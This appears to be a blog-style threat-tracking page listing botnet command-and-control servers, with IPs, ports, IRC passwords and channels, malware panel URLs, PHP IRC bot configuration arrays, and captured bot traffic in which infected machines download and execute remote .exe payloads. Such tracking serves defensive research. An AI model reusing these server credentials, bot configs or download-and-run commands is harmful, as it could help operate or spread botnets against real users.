Author: Pig

Panel picture: Panel url: http://22079a17.urlbeat.net exe file used to infect: http://d5243fd7.filesonthe.net hosting infos: http://whois.domaintools.com/69.162.107.11

safetysamvps.info 199.119.201.232 Server: 199.119.201.232:6667 Server Password: Username: Catalyst21 Nickname: n{DEU|XP-32}214249 Channel: #Catalyst (Password: ) Channeltopic: Now talking in #catalyst Topic On: [ #catalyst ] [ IRC ] Topic By: [ Execute ] hosting infos: http://whois.domaintools.com/199.119.201.232

api.trafficnum.net 184.106.152.29 Server: 184.106.152.29:2345 Server Password: Username: x Nickname: n[DEU|XP]7983462 Channel: #!prbla! (Password: ) Channeltopic: :.m /125/125/85/84/52/33/11/110/108/114/59/118/70/112/100/115/112/96/55/69/127/100/42/54/28/33/17/63/48/51/ Topic By: [ spin ] hosting infos: http://whois.domaintools.com/184.106.152.29

Remote Host Port Number 199.15.234.7 80 50.17.217.128 80 83.233.33.6 80 88.13.254.233 4242 PASS secret PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}egiruwp USER egiruwp 0 0 :egiruwp PONG :ED4B405C JOIN ##n secret PRIVMSG ##n :[d=”http://dl.dropbox.com/u/40789812/Comet1185501.exe” s=”279040 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/88.13.254.233

Panel here: http://92.241.130.174/vn/ http://92.241.130.174/vn/bot/ this malware is being for sell in hecking boards screen of panel here: hosting infos: http://whois.domaintools.com/92.241.130.174

This http botnet is very big one FAKE ANTIVIRUS wich infect machines connect to http to reports infections or download files control panel here: http://www.duffiduffid.ru/stat/ http://www.duffiduffid.ru/stat/stat3.php Resolved : [duffiduffid.ru] To [82.210.157.9] Resolved : [duffiduffid.ru] To [113.161.87.176] Resolved : [duffiduffid.ru] To [71.217.16.11] Resolved : [duffiduffid.ru] To [60.19.30.135] Resolved : [duffiduffid.ru] To [87.126.200.246] hosting infos: http://whois.domaintools.com/87.126.200.246

var $config = array(“server”=>”69.162.81.123”, “port”=>2221, “pass”=>”lol1”, “prefix”=>”[NkD]-“, “maxrand”=>8, “chan”=>”#nkd”, “key”=>””, “modes”=>”+iB-x”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” var $config = array(“server”=>”69.162.81.123”, “port”=>2222, “pass”=>”mgn22”, “prefix”=>”BOTN3T|”, “maxrand”=>8, “chan”=>”#magno”, “key”=>””, “modes”=>”+iB-x”, “password”=>”soufoda”, “trigger”=>”.”, “hostauth”=>”*” hosting infos: http://whois.domaintools.com/69.162.81.123

the noob is xGoogle from hackforums he have like 6 leafs and he think he’s a hecker lol every botnet in the blog wich uses the port 1888 is from him Remote Host Port Number 146.0.73.82 1888 PASS strike 199.101.133.57 80 199.15.234.7 80 70.38.98.239 80 PRIVMSG #XP :[d=”http://img105.herosh.com/2011/10/23/296108402.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplicationRead more...

Remote Host Port Number 199.15.234.7 80 31.214.201.171 1888 PASS strike NICK n{US|XPa}dciaump USER dciaump 0 0 :dciaump JOIN #asdf strike Now talking in #asdf Topic On: [ #asdf ] [ ~pu http://dc429.4shared.com/download/IwwpPGS9/sdafsdfad54534.exe b8b96e49511c4b1c70211be8a3968240 ~s -o ~s ] Topic By: [ google ] JOIN #XP JOIN #US hosting infos: http://whois.domaintools.com/31.214.201.171

Remote Host Port Number 146.0.73.83 1888 PASS strike 199.15.234.7 80 70.38.98.238 80 NICK n{US|XPa}wdpvgfm USER wdpvgfm 0 0 :wdpvgfm JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img104.herosh.com/2011/10/21/2578445.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 The data identified by the following URLs was then requested from the remote webRead more...